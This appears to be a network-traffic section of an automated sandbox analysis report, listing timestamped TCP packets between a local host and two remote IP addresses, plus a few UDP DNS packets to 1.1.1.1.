                                                                                                                                                                                                                                      Dec 16, 2024 08:28:25.248440027 CET4987980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:25.368108988 CET8049879173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.753021002 CET8049879173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.753036976 CET8049879173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.753099918 CET4987980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.753148079 CET4987980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.758727074 CET4987980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.759011984 CET4987980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.878684044 CET8049879173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.878751993 CET4987980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:27.992989063 CET4988680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:28.112735033 CET8049886173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:28.112807035 CET4988680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:28.113275051 CET4988680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:28.233160973 CET8049886173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:29.514801979 CET8049886173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:29.514816999 CET8049886173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:29.514877081 CET4988680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:29.515472889 CET4988680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:29.515507936 CET4988680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:30.788019896 CET4989680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:30.907727003 CET8049896173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:30.907835007 CET4989680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:30.908417940 CET4989680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:31.028090954 CET8049896173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.309447050 CET8049896173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.309479952 CET8049896173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.309530020 CET4989680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.309612036 CET4989680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.323699951 CET4989680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.323777914 CET4989680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.752033949 CET191249842159.223.34.114192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.752155066 CET498421912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.754642010 CET498421912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:33.630598068 CET4990280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:33.751760006 CET8049902173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:33.751838923 CET4990280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:33.758671045 CET4990280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:33.879956961 CET8049902173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:35.154102087 CET8049902173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:35.154206038 CET8049902173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:35.154294014 CET4990280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:35.154345036 CET4990280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:35.159152031 CET4990280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:35.159194946 CET4990280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:36.472809076 CET4990980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:36.592731953 CET8049909173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:36.592822075 CET4990980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:36.648967981 CET4990980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:36.768889904 CET8049909173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:37.767894030 CET499141912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:37.887892962 CET191249914159.223.34.114192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:37.888005972 CET499141912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:37.893065929 CET499141912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:37.991583109 CET8049909173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:37.991600037 CET8049909173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:37.991657019 CET4990980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:38.012756109 CET191249914159.223.34.114192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:38.033740997 CET4990980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:38.033821106 CET4990980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:39.209404945 CET4991780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:39.329437017 CET8049917173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:39.329515934 CET4991780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:39.340348959 CET4991780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:39.460114002 CET8049917173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:40.731707096 CET8049917173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:40.731750965 CET8049917173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:40.731808901 CET4991780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:40.731808901 CET4991780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:40.732507944 CET4991780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:40.732507944 CET4991780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:41.674379110 CET4992780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:41.794224024 CET8049927173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:41.794576883 CET4992780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:41.794857025 CET4992780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:41.914616108 CET8049927173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:43.193332911 CET8049927173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:43.193361044 CET8049927173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:43.193437099 CET4992780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:43.193865061 CET4992780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:43.193928957 CET4992780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:44.080374956 CET4993380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:44.200181961 CET8049933173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:44.200330019 CET4993380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:44.200712919 CET4993380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:44.320442915 CET8049933173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:45.684885979 CET8049933173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:45.684901953 CET8049933173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:45.684984922 CET4993380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:45.690402985 CET4993380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:45.690466881 CET4993380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:46.580926895 CET4993980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:46.700736046 CET8049939173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:46.700830936 CET4993980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:46.701138973 CET4993980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:46.820779085 CET8049939173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:48.100435972 CET8049939173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:48.100450993 CET8049939173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:48.100512981 CET4993980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:48.101850986 CET4993980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:48.101919889 CET4993980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:49.026422977 CET4994580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:49.146352053 CET8049945173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:49.146528006 CET4994580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:49.180699110 CET4994580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:49.300621033 CET8049945173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:50.548254013 CET8049945173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:50.548278093 CET8049945173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:50.548345089 CET4994580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:50.548345089 CET4994580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:50.549043894 CET4994580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:50.549112082 CET4994580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:51.317193031 CET4995180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:51.437387943 CET8049951173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:51.437463999 CET4995180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:51.438167095 CET4995180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:51.558069944 CET8049951173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:52.839637995 CET8049951173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:52.839701891 CET8049951173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:52.839729071 CET4995180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:52.839757919 CET4995180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:52.841758966 CET4995180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:52.841850996 CET4995180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:53.565016031 CET4995780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:53.684807062 CET8049957173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:53.684910059 CET4995780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:53.685179949 CET4995780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:53.805480003 CET8049957173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.095558882 CET8049957173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.095619917 CET8049957173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.095690966 CET4995780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.102926016 CET4995780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.103775978 CET4995780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.223016977 CET8049957173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.223233938 CET4995780192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.846319914 CET4996380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.966223001 CET8049963173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.966321945 CET4996380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.966562986 CET4996380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:56.086443901 CET8049963173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:57.401066065 CET8049963173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:57.401164055 CET8049963173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:57.401170015 CET4996380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:57.401223898 CET4996380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:57.403086901 CET4996380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:57.403112888 CET4996380192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:58.145947933 CET4996980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:58.265794992 CET8049969173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:58.265898943 CET4996980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:58.270940065 CET4996980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:58.390681982 CET8049969173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.667606115 CET8049969173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.667768955 CET8049969173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.667836905 CET4996980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.668256998 CET4996980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.668298960 CET4996980192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.801374912 CET191249914159.223.34.114192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.801440001 CET499141912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.804943085 CET499141912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:00.254463911 CET4997580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:00.374967098 CET8049975173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:00.375087023 CET4997580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:00.375811100 CET4997580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:00.495588064 CET8049975173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:01.779937983 CET8049975173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:01.779958010 CET8049975173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:01.780038118 CET4997580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:01.806159973 CET4997580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:01.810993910 CET4997580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:01.926424026 CET8049975173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:01.926521063 CET4997580192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:02.502999067 CET4998180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:02.622797966 CET8049981173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:02.622881889 CET4998180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:02.623119116 CET4998180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:02.742738008 CET8049981173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.024187088 CET8049981173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.024240971 CET8049981173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.024274111 CET4998180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.024313927 CET4998180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.029804945 CET4998180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.029829979 CET4998180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.816520929 CET499871912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.817470074 CET4998880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.936292887 CET191249987159.223.34.114192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.936382055 CET499871912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.936685085 CET499871912192.168.2.6159.223.34.114
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.937160969 CET8049988173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.937222004 CET4998880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.937452078 CET4998880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:05.056436062 CET191249987159.223.34.114192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:05.057107925 CET8049988173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:06.366533995 CET8049988173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:06.366601944 CET4998880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:06.366616964 CET8049988173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:06.366694927 CET4998880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:06.380264044 CET4998880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:06.380289078 CET4998880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:06.943039894 CET4999480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:07.063107014 CET8049994173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:07.065118074 CET4999480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:07.073662996 CET4999480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:07.193312883 CET8049994173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:08.465770006 CET8049994173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:08.465841055 CET4999480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:08.465859890 CET8049994173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:08.465913057 CET4999480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:08.466572046 CET4999480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:08.466600895 CET4999480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:09.048779011 CET5000180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:09.169478893 CET8050001173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:09.169570923 CET5000180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:09.169903040 CET5000180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:09.289577007 CET8050001173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:10.580389977 CET8050001173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:10.580492973 CET5000180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:10.580524921 CET8050001173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:10.580574989 CET5000180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:10.581161022 CET5000180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:10.581180096 CET5000180192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:11.104793072 CET5000680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:11.224687099 CET8050006173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:11.224822998 CET5000680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:11.225313902 CET5000680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:11.345211029 CET8050006173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:12.622312069 CET8050006173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:12.622325897 CET8050006173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:12.622385025 CET5000680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:12.623085976 CET5000680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:12.623105049 CET5000680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:12.744601011 CET8050006173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:12.744791031 CET5000680192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:13.166023970 CET5001280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:13.286135912 CET8050012173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:13.286240101 CET5001280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:13.286533117 CET5001280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:13.406286955 CET8050012173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:14.688066959 CET8050012173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:14.688082933 CET8050012173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:14.688196898 CET5001280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:14.730194092 CET5001280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:14.730307102 CET5001280192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:15.433094978 CET5001880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:15.552798033 CET8050018173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:15.553097963 CET5001880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:15.553472996 CET5001880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:15.673332930 CET8050018173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:16.953166962 CET8050018173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:16.953233957 CET8050018173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:16.953284025 CET5001880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:16.953339100 CET5001880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:16.955491066 CET5001880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:16.955514908 CET5001880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:17.075728893 CET8050018173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:17.075817108 CET5001880192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:17.307656050 CET5002480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:17.427349091 CET8050024173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:17.427473068 CET5002480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:17.427798986 CET5002480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:17.547635078 CET8050024173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:18.828564882 CET8050024173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:18.828597069 CET8050024173.194.221.82192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:18.828741074 CET5002480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:18.829370022 CET5002480192.168.2.6173.194.221.82
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:18.829421043 CET5002480192.168.2.6173.194.221.82

                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:40.409580946 CET5746453192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:40.836802006 CET53574641.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:43.688452959 CET5591153192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:44.002563000 CET53559111.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:46.833417892 CET5986453192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:47.146748066 CET53598641.1.1.1192.168.2.6

                                                                                                                                                                                                                                      DNS Queries

